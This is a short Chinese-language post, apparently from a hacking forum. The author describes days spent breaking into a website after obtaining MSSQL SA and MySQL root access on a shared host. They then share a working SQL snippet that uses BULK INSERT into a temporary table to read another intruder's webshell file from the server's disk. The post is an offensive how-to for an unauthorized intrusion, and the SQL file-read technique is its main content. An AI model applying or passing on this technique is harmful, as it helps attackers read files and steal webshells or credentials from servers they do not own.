这两天一直入侵一个网站 各种提权

包括

mssql：SA

mysql：ROOT

主机是星外的  可以看到目标目录

数据库是ASP的 不能插马

无奈找了很多人都木有办法。。。

今天无聊中查看目录 发现有一个高人上传了一个WEBSHELL

在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下

    Use webshell.cc;--(这里是随便选的一个数据库)
　　drop table cmd;
　　create table cmd (a text);
　　BULK INSERT cmd
　　FROM 'd:/freehos/webshell.cc.asp'
　　WITH (
　　FIELDTERMINATOR = 'n',
　　ROWTERMINATOR = 'nn'
　　)
　　select * from cmd
　　这样就成功读出了d:/freehos/webshell.cc.asp